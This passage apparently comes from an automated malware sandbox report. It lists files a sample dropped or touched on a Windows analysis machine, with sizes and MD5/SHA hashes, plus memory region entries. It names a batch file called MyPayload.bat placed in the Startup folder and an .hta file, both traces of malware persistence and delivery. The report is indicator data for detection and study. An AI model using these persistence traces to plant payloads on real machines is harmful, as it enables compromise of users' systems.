                                                                                8926d267308877242f8c75659ef3fa7c5e1d6c9c1789328713da1e203209c3a7fc484890b0c24c3c80b1ef8e52a6846e7b805e335551d0dec1f038f4a7ba7949

                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp12C7.tmp

                                                                                Filesize

                                                                                14KB

                                                                                MD5

                                                                                f274ba5152124012ef8108aea0ba5e2d

                                                                                SHA1

                                                                                1ff53eb2682796f4ad0dbbbe3c56546eff30c80d

                                                                                SHA256

                                                                                7af9aa25ced129009e37daabbe4a8549d27e62d5c4f22e642fef10f97e5302df

                                                                                SHA512

                                                                                3791f07be151373899c8cc21f79f906afc05a86b56ba07f6be74583e88aecf65be5cab1da06a1ce45b5549615d73044bfff902c094c413b0d414b792bfea1fe7

                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp1913.tmp

                                                                                Filesize

                                                                                40KB

                                                                                MD5

                                                                                a182561a527f929489bf4b8f74f65cd7

                                                                                SHA1

                                                                                8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                SHA256

                                                                                42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                SHA512

                                                                                9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp1928.tmp

                                                                                Filesize

                                                                                114KB

                                                                                MD5

                                                                                db78fd083bc8918ce8a2cc5cb79944db

                                                                                SHA1

                                                                                8887055003ce9177d6eab0f7a427f093e1746118

                                                                                SHA256

                                                                                c9bc9eba37de0346ed5661939e150bed121d880d563098857ca846bb854fb1ef

                                                                                SHA512

                                                                                cf8f216f2a851fb208f2f534efbcb64c60a4009683bdb10887426412ebe39fd7908ec8ac039d7fca5ac35f4d85a7698da5ac02b5350022096a47582a62c72666

                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp1944.tmp

                                                                                Filesize

                                                                                48KB

                                                                                MD5

                                                                                349e6eb110e34a08924d92f6b334801d

                                                                                SHA1

                                                                                bdfb289daff51890cc71697b6322aa4b35ec9169

                                                                                SHA256

                                                                                c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

                                                                                SHA512

                                                                                2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp194A.tmp

                                                                                Filesize

                                                                                20KB

                                                                                MD5

                                                                                49693267e0adbcd119f9f5e02adf3a80

                                                                                SHA1

                                                                                3ba3d7f89b8ad195ca82c92737e960e1f2b349df

                                                                                SHA256

                                                                                d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

                                                                                SHA512

                                                                                b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp198E.tmp

                                                                                Filesize

                                                                                116KB

                                                                                MD5

                                                                                f70aa3fa04f0536280f872ad17973c3d

                                                                                SHA1

                                                                                50a7b889329a92de1b272d0ecf5fce87395d3123

                                                                                SHA256

                                                                                8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                                                SHA512

                                                                                30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp19A9.tmp

                                                                                Filesize

                                                                                96KB

                                                                                MD5

                                                                                40f3eb83cc9d4cdb0ad82bd5ff2fb824

                                                                                SHA1

                                                                                d6582ba879235049134fa9a351ca8f0f785d8835

                                                                                SHA256

                                                                                cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

                                                                                SHA512

                                                                                cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                Filesize

                                                                                479KB

                                                                                MD5

                                                                                09372174e83dbbf696ee732fd2e875bb

                                                                                SHA1

                                                                                ba360186ba650a769f9303f48b7200fb5eaccee1

                                                                                SHA256

                                                                                c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                                                                                SHA512

                                                                                b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                                                Filesize

                                                                                13.8MB

                                                                                MD5

                                                                                0a8747a2ac9ac08ae9508f36c6d75692

                                                                                SHA1

                                                                                b287a96fd6cc12433adb42193dfe06111c38eaf0

                                                                                SHA256

                                                                                32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                                                                                SHA512

                                                                                59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                                                                              • C:\Users\Admin\AppData\Local\Temp\vCWgE21DY.hta

                                                                                Filesize

                                                                                726B

                                                                                MD5

                                                                                6dd9f0f9b49162ff6ae5afb95c6c38bc

                                                                                SHA1

                                                                                440c5cfeec40195a20f17bd9373ad7564d24f5f5

                                                                                SHA256

                                                                                0b9a8d6c4fc87853ea6ee2101ce2a156780f97f03475b42b0da89f1de43efe6d

                                                                                SHA512

                                                                                dd6501567e36579902819b73fefe301a8588e7da518b2a8a6ebc80f78837a2d2eb3d082c3bf55c350223ea1aff150fd4d675ec64187b3400b855a088a0f4a458

                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

                                                                                Filesize

                                                                                330KB

                                                                                MD5

                                                                                aee2a2249e20bc880ea2e174c627a826

                                                                                SHA1

                                                                                aa87ed4403e676ce4f4199e3f9142aeba43b26d9

                                                                                SHA256

                                                                                4d9c00fc77e231366228a938868306a71383967472d0bbf1a89afe390d80599c

                                                                                SHA512

                                                                                4e96c2aa60cc1904ac5c86389f5d1226baf4ef81e2027369979ec253b383eccc666da268647843d1db128af16d1504cdc7c77757ad4147a0332ec9f90041a110

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin

                                                                                Filesize

                                                                                13KB

                                                                                MD5

                                                                                cf04230e641b81d558db728a5b00b46b

                                                                                SHA1

                                                                                7c6eadbcd0fd79db6cafb5359b9b60271a89afc2

                                                                                SHA256

                                                                                02a871b0f2ca2ea5a5613ae77ed47c56088ee17b0ffe594d5e387dfad4e118aa

                                                                                SHA512

                                                                                5c133e667fd473424f72235db649a77a8e0455ad27df028e6711fb7c10bd4ae4ec0e633ff37e116fbe55ac7d4a3112464e523a5a1b13560248da749cf1aacf64

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin

                                                                                Filesize

                                                                                13KB

                                                                                MD5

                                                                                612cdfac9ad6b3bf768baff37d4813e1

                                                                                SHA1

                                                                                c03d19b27208a2a734db087fbe684ec8f28ee428

                                                                                SHA256

                                                                                0cba88f6365b2f0eb43ff41b1ff628c701f0935557d4a67597bd1825d680bad7

                                                                                SHA512

                                                                                3b385a61554ca07f4ecf3c1f066d1c5b1ff76088c8bb65509d3d2d4f69985a1b0fd660e02cb9123f11933d7843648a877c3bad3b40cb1a0142f0ea0c23480ae0

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin

                                                                                Filesize

                                                                                18KB

                                                                                MD5

                                                                                18b303e8c4eee6cc1db5af2294e11055

                                                                                SHA1

                                                                                a19b2505c40a4c3adfec2ae9c412439157b1ae1e

                                                                                SHA256

                                                                                dc3f69a3d95eeec633391d7b38ef8dc7c82120f9624fb206c8cf8c04e79fbbac

                                                                                SHA512

                                                                                e6b9c5afa2debfb7c9d5e3f23f7639b71bde1db9d6efeb288b25d21cf6b1a44c26434f9c21691216afb89e1950fcc9617124cfe1ed09abc4ca304012b44db784

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\broadcast-listeners.json

                                                                                Filesize

                                                                                221B

                                                                                MD5

                                                                                65c47ba05520f945199ab7176a4b51da

                                                                                SHA1

                                                                                98d6462634fa3823c05ae5c857b5df3c7b55799d

                                                                                SHA256

                                                                                cfdbed896cf1d77872bfb53b5ef478dd860718598541ac4c28f72f611ad49cf1

                                                                                SHA512

                                                                                896ab5ef35bd245c2c25d78815a7fdb04d02d17e8f2f8a565c8558222d4794f3bbaa45e177e80af6b2d1bf4955e8356dd241d6662ebf32e072a120cf83e48690

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

                                                                                Filesize

                                                                                5KB

                                                                                MD5

                                                                                c57db9c8515a72b44f45c316d00eb3b0

                                                                                SHA1

                                                                                a0a2bb0a22ccaa386009e1c14527e32a26b6a33c

                                                                                SHA256

                                                                                6deb4846b0c1e452c7a2a2718ab34a1b9f4e51b5b69079ccc788caea50130c12

                                                                                SHA512

                                                                                86b559760b75300c8d1190c2dd324689b5ae7e7f578737a8cd8aac57a1f8be0f6db632005a64f15f586b0df38d993290dc671c3f89af23f6157e4610c5765f33

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

                                                                                Filesize

                                                                                6KB

                                                                                MD5

                                                                                a3cd9aea402fc9697e7b1a2c98d792e6

                                                                                SHA1

                                                                                bb679ee74802d597156ddcd8fed933db0d26c9b7

                                                                                SHA256

                                                                                c0b9c99e74cdc08e0959e5df09a762d1089a04ea66b170168742a67123ecadbe

                                                                                SHA512

                                                                                b7760c0dbd450dea84d60ce3f5f07be194a4e830e49d1d538597bdc6b195c891596bf568aa828f29267f1018f0cb57d05d04835e3191e0bdf9db957356d29a9e

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

                                                                                Filesize

                                                                                15KB

                                                                                MD5

                                                                                10fc266ef3b2964110f65910f1709c86

                                                                                SHA1

                                                                                780122bd8081329a814799acc51dd20d798748c5

                                                                                SHA256

                                                                                a6bd22d24e5370c459041f95e779745d762f15e58cb44792f65a52390c9fec37

                                                                                SHA512

                                                                                33bd8556815a7a20b720d2e380268422c945deb0a61cea345c4c0a0be9c5066b17d02b4b5d4253b5134be062c0f3c0aff7ec03192940aa7177f3b5e47e16747a

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

                                                                                Filesize

                                                                                15KB

                                                                                MD5

                                                                                689a6f0d127bfab77aa9e05b2f90959e

                                                                                SHA1

                                                                                3fe5447bbf25c7b4da57c5da224631def5012e4e

                                                                                SHA256

                                                                                2714f489acf49bb05502ac2acbdb6ac1fb2f3b72f495d98789095783782501fd

                                                                                SHA512

                                                                                36e9d0470deb6d0a167344239b3c0f7975dde246a30491ce23bfe116eb050c63f06522eb81ec647b3e60623a1c0b00dbb6371e8f98ab73626ef6d80cf65f334c

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

                                                                                Filesize

                                                                                15KB

                                                                                MD5

                                                                                08edf675a6a460e17608c0615d796dc0

                                                                                SHA1

                                                                                0a9e7637348970e579bf4fb353e6e72fe78a5999

                                                                                SHA256

                                                                                1bb427f0295ee48cc1965e4dc3d2d6a6176cb09d2fe4d7794feb2604c324f09a

                                                                                SHA512

                                                                                492836882574ba5e9607919b9e1e4aaea5fedbb7f313506cf941340a6371b5852188af9d466c197b76c523bac160b25163b843efcbc55dba349fe611c36f2d33

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

                                                                                Filesize

                                                                                14KB

                                                                                MD5

                                                                                bb1255d8f82cf084a0754091d7739756

                                                                                SHA1

                                                                                8eb13947bd9b9a016380b8caa344961e01c10f0e

                                                                                SHA256

                                                                                a0048d92cf052d9c226e5d7ac6d15a25c75e7321800eb40e0a385a9d87e3ada1

                                                                                SHA512

                                                                                bd50bbbeccc5e7275469ffbc6908bf18537d1c7c6eaadd77dd8c24fcf9d7eac5f797ff00a559e508a6eb532c1e7c7598ca330fe4a0ce63aa6477b7a8b58a9517

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

                                                                                Filesize

                                                                                17KB

                                                                                MD5

                                                                                ee26e303ea971ee464729e4d2d14d706

                                                                                SHA1

                                                                                0928e8fea53fb76e901fab4f6d9cab335e0308f7

                                                                                SHA256

                                                                                2c37991a38639f92ac9be80af129a25cf55125ffbd6955b9e8c79cefaf12d021

                                                                                SHA512

                                                                                5210947d3d59aef84672fb8d9592424b091e7705a74ace3ef4a4b85ae2571a045f7dbbdfaa5b3c0cb13778b76256748b8c3031f0ba2a6ce31b5b0e3548689303

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

                                                                                Filesize

                                                                                15KB

                                                                                MD5

                                                                                08415ba8ca5269a1a87f710822166391

                                                                                SHA1

                                                                                5aab42d60cab9dee9f61dc20994b2929175f867e

                                                                                SHA256

                                                                                ba10af2f86724e9986b0cda1a16e68b8062c6d8bc575819a5653928cf5d10c6d

                                                                                SHA512

                                                                                1d3c15669f4c30cbcc94398d3d168c5ae898b5fd6f09f5167372049f53927768236d89b250b5b8243c844a593f0ad6e427e1f9ca7bdaacb9e594e1d182243377

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\056a54b6-2baa-4065-b2d8-87d4ef12ed63

                                                                                Filesize

                                                                                28KB

                                                                                MD5

                                                                                4a514196154fa3af6f15c2a41975d4fa

                                                                                SHA1

                                                                                3ead7fe4f7e84fb56ff148216ef903e6c95ffeca

                                                                                SHA256

                                                                                ee88761bbb170833c49b9ad1b9e74dd897b239591d1b20899ec6361e6ee1691e

                                                                                SHA512

                                                                                231143564923c9bd6d631255525b18318a895a97d87fed0a989d0a8f0fcb3cdac82e35fdb2a74dcb49ce0d28bc8b150fe05ed1be5ed549172579d8dcef6878ba

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\4957553d-394d-4d81-a141-8353a0c0cacc

                                                                                Filesize

                                                                                661B

                                                                                MD5

                                                                                053f883a33f8ee3c89c7e72369857a95

                                                                                SHA1

                                                                                4b50cdc1aa7ee04f3f507d33965ecee981e07d25

                                                                                SHA256

                                                                                d5cb7e897eaaae65275a612c900c76869910ff3f58f8d075391402699c7381b9

                                                                                SHA512

                                                                                1b96458f5df8f22fbbb87c979132291d991e593f0e7fa5a69cdf93a762d1222a5b68dc205c796c6e96ca0a041aa559a1022171f61f01c5e8cfbe798dcedf3421

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\6bda77be-789f-405f-9343-a2facab3d10a

                                                                                Filesize

                                                                                982B

                                                                                MD5

                                                                                e95cb237fb66f68ce9256c22a5ec1c4b

                                                                                SHA1

                                                                                2ff561c63e3e12c748fb0981437e8d60f3ea2468

                                                                                SHA256

                                                                                f4241ef3eaadf0d4954906d0523d3ce42d4c7bf55fdfee10a2e7de59772c0732

                                                                                SHA512

                                                                                e34f38b3471eed608e82e9dbb739e7133b9ce9cfb7a7f85c84238e07c9fe885513021cbeae59e3e81c872cbaab7013da45025d32399752a2a4351779e52233ac

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\6fc7a9a5-4992-402f-93c7-b41d01b0f1d2

                                                                                Filesize

                                                                                793B

                                                                                MD5

                                                                                e75be42753ebe2167321c183d836e948

                                                                                SHA1

                                                                                464fd8952f09f712ce0eba48f1cee2229fc6af9c

                                                                                SHA256

                                                                                3aa7c8783f9f51c4492edee57bacc6342d11f7f3738c2e6057ae70afd5ac60aa

                                                                                SHA512

                                                                                2b6acdab9342f102c3ff3da99cd366653a1d4804135812b1d65b92f0c069e999c366fbcb4d5b386d263913008fcd68c9545afa8d5aa818db6c7f37c6c8a5ee9f

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\704920fc-dd4d-4df4-b9df-341ef6149df8

                                                                                Filesize

                                                                                671B

                                                                                MD5

                                                                                5dff3f6e6b344190fda967da5569b1c0

                                                                                SHA1

                                                                                f3823ce2914a8b15b1429a48e85f3880701bce93

                                                                                SHA256

                                                                                285ae8fe5aaae1e1dccef2c64b110d0d3fd2c948f0636bf359e739fff655b732

                                                                                SHA512

                                                                                c7c85829f8b2052869ffdb7b84c2ae72f42afcc3d74c99c57701441d646e01eb57ceeccfd2e8fa49b975c827affd2c562d2c84fde4d0563dda87d2c771146941

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\849fefb2-33b2-4f15-85ab-4d35a205f5d7

                                                                                Filesize

                                                                                788B

                                                                                MD5

                                                                                a014a30735f8fb4c920229507d80f608

                                                                                SHA1

                                                                                0c55590d4f25a5d0b6f8ea69f2b25ff494ff3ee4

                                                                                SHA256

                                                                                181e9b4c58df45a7c41866eb3ce8b37242bdb0dae7b6cfd4fc07f2d66efcc8ca

                                                                                SHA512

                                                                                475eee4c3bf0ae7a1411334816797434395402f81e9d653d50b7bfa48bf51b94964e9b41913ee6a43bd2242528d460ff78e47f0f9fce1d79e80b455c8b8da63b

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\df79948a-eca6-4fe5-bcde-de02485071a3

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                383c92fb0bfb26f781fdf7987054288c

                                                                                SHA1

                                                                                90121181a771aa9a8ad7c421b54caf6308a3176c

                                                                                SHA256

                                                                                774db2cc94e4a6ea1ac9e0126ee1eacc0870930c172500c2860f5bcd08d41b6b

                                                                                SHA512

                                                                                0116b306dfabea5b842237f343a399e90c9d3d3cef94b5594502d03264ce0a08333abaa984ac0e7427556bc82ca6577b61d9b2c63aff26313888b5657b2a4df2

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                                                                Filesize

                                                                                1.1MB

                                                                                MD5

                                                                                842039753bf41fa5e11b3a1383061a87

                                                                                SHA1

                                                                                3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                                                                SHA256

                                                                                d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                                                                SHA512

                                                                                d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                                                                Filesize

                                                                                116B

                                                                                MD5

                                                                                2a461e9eb87fd1955cea740a3444ee7a

                                                                                SHA1

                                                                                b10755914c713f5a4677494dbe8a686ed458c3c5

                                                                                SHA256

                                                                                4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                                                                SHA512

                                                                                34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                                                                Filesize

                                                                                372B

                                                                                MD5

                                                                                bf957ad58b55f64219ab3f793e374316

                                                                                SHA1

                                                                                a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                                                                SHA256

                                                                                bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                                                                SHA512

                                                                                79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                                                                Filesize

                                                                                17.8MB

                                                                                MD5

                                                                                daf7ef3acccab478aaa7d6dc1c60f865

                                                                                SHA1

                                                                                f8246162b97ce4a945feced27b6ea114366ff2ad

                                                                                SHA256

                                                                                bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                                                                SHA512

                                                                                5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

                                                                                Filesize

                                                                                9KB

                                                                                MD5

                                                                                fd9012a32582d6de516681bf6f63a666

                                                                                SHA1

                                                                                02928bae3efb6060ad8aa9e237989d56491c6738

                                                                                SHA256

                                                                                01bc13f43ae9e2ad1b2aa155904dadb6365d720347845b70b45ed817a7252252

                                                                                SHA512

                                                                                f2e05ea0f9dc87966a7cc144b229a2c6085607cb282d269c25779f5c042e6745de0044e2dcb1d22da08daf432e5bf603d0e2d2fcd587b70f3179e297ab1dd76b

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

                                                                                Filesize

                                                                                14KB

                                                                                MD5

                                                                                e64ccbaab63ad81af5b45b10a2d6e88a

                                                                                SHA1

                                                                                8479f452e45fef91dc7776c7d2b28f34007b9ba0

                                                                                SHA256

                                                                                b73c5a9bfa4398e28f91bb8d5857fd93253fc599474baf21735bd8553094c36d

                                                                                SHA512

                                                                                a43253178eeae114d82cc9312d46778f3c83f7f5a2b427fde7a0a8d37e7c122e1e452ec5249b671b422b1b60cae851e138f893a1bbb1eca8663baa7cb21986fb

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

                                                                                Filesize

                                                                                10KB

                                                                                MD5

                                                                                12c0021293a7dd63f98d2975ef3358e4

                                                                                SHA1

                                                                                8ba53d734c1c6443cb0389c2f90b59a351d81632

                                                                                SHA256

                                                                                383bfe03b525accae1f143415b9896393659e744ea9c054c9321730368863955

                                                                                SHA512

                                                                                7c1f7ee4ae092c7e1acfb9345e9d6e685eee7db2ebf9557e5c71dacb630669900b18a4cd2c20363bbb66eb0f79701e62d90624533226e14866c0a79d0228bc6c

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

                                                                                Filesize

                                                                                14KB

                                                                                MD5

                                                                                64a29e5efcda26e0f92677fde953552c

                                                                                SHA1

                                                                                c2c0a4b40478268ed57e5321f01d43e07e0977d9

                                                                                SHA256

                                                                                b55ad23c75f31d6605ea36161ea09dcdbbe15d69b854ab9a6ae6934f5005ca0a

                                                                                SHA512

                                                                                44be4c7a0b30451d6a40cfbc72236da443d2ef310f29a32690d3d4b8221a127d7a37d5eda4a7e9327cb377a20cee1136a7fefab14e46f0dbebe52cef3e3b4a59

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs.js

                                                                                Filesize

                                                                                10KB

                                                                                MD5

                                                                                6b982f279dae73d076a8fb112d2fc30c

                                                                                SHA1

                                                                                ff386cf526b9e0698fdc1de370536c0c9eb6a550

                                                                                SHA256

                                                                                c050f0bca9cc6891d845354d69a63c2645410612907b7bab103819708e46d85d

                                                                                SHA512

                                                                                9c62719f5bb126f85de5438cf0292f42c117a2fbef7d7be81b4b9f0481302ac0138dbc331cb06071912d11b3b62e97473a3445db0ee2aac7d5572517b4cf71f3

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\sessionCheckpoints.json

                                                                                Filesize

                                                                                53B

                                                                                MD5

                                                                                ea8b62857dfdbd3d0be7d7e4a954ec9a

                                                                                SHA1

                                                                                b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a

                                                                                SHA256

                                                                                792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da

                                                                                SHA512

                                                                                076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\sessionCheckpoints.json

                                                                                Filesize

                                                                                90B

                                                                                MD5

                                                                                c4ab2ee59ca41b6d6a6ea911f35bdc00

                                                                                SHA1

                                                                                5942cd6505fc8a9daba403b082067e1cdefdfbc4

                                                                                SHA256

                                                                                00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2

                                                                                SHA512

                                                                                71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\sessionstore-backups\recovery.baklz4

                                                                                Filesize

                                                                                5KB

                                                                                MD5

                                                                                69b86726c7a6524081d904c978893e26

                                                                                SHA1

                                                                                d410f73c938c83690fffd57f84edb48fd1b0454d

                                                                                SHA256

                                                                                ae801ddf0b98808b63c8bb18377fedaa62fc2fbc3f86fc2feb5a3d003b2870f9

                                                                                SHA512

                                                                                f5e9e137fb09dac5c17ca3f543079ef3a8ad9a25d56d38acf781840d59f482b934f1d813c618d769f9ba2a74693b6da70bedf9a2ada02dbb38929985c0988b7d

                                                                              • memory/212-146-0x0000000005FF0000-0x000000000603C000-memory.dmp

                                                                                Filesize

                                                                                304KB

                                                                              • memory/884-680-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1194-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1162-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1177-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1187-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-643-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1193-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-679-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1174-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-644-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-672-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1198-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1200-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1201-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-1202-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/884-677-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/1320-59-0x0000000005BD0000-0x0000000005BEE000-memory.dmp

                                                                                Filesize

                                                                                120KB

                                                                              • memory/1320-77-0x00000000070C0000-0x0000000007156000-memory.dmp

                                                                                Filesize

                                                                                600KB

                                                                              • memory/1320-74-0x0000000007320000-0x000000000799A000-memory.dmp

                                                                                Filesize

                                                                                6.5MB

                                                                              • memory/1320-58-0x0000000005740000-0x0000000005A94000-memory.dmp

                                                                                Filesize

                                                                                3.3MB

                                                                              • memory/1320-75-0x0000000006100000-0x000000000611A000-memory.dmp

                                                                                Filesize

                                                                                104KB

                                                                              • memory/1320-48-0x00000000055D0000-0x0000000005636000-memory.dmp

                                                                                Filesize

                                                                                408KB

                                                                              • memory/1320-79-0x0000000007F50000-0x00000000084F4000-memory.dmp

                                                                                Filesize

                                                                                5.6MB

                                                                              • memory/1320-47-0x00000000054F0000-0x0000000005556000-memory.dmp

                                                                                Filesize

                                                                                408KB

                                                                              • memory/1320-46-0x00000000052D0000-0x00000000052F2000-memory.dmp

                                                                                Filesize

                                                                                136KB

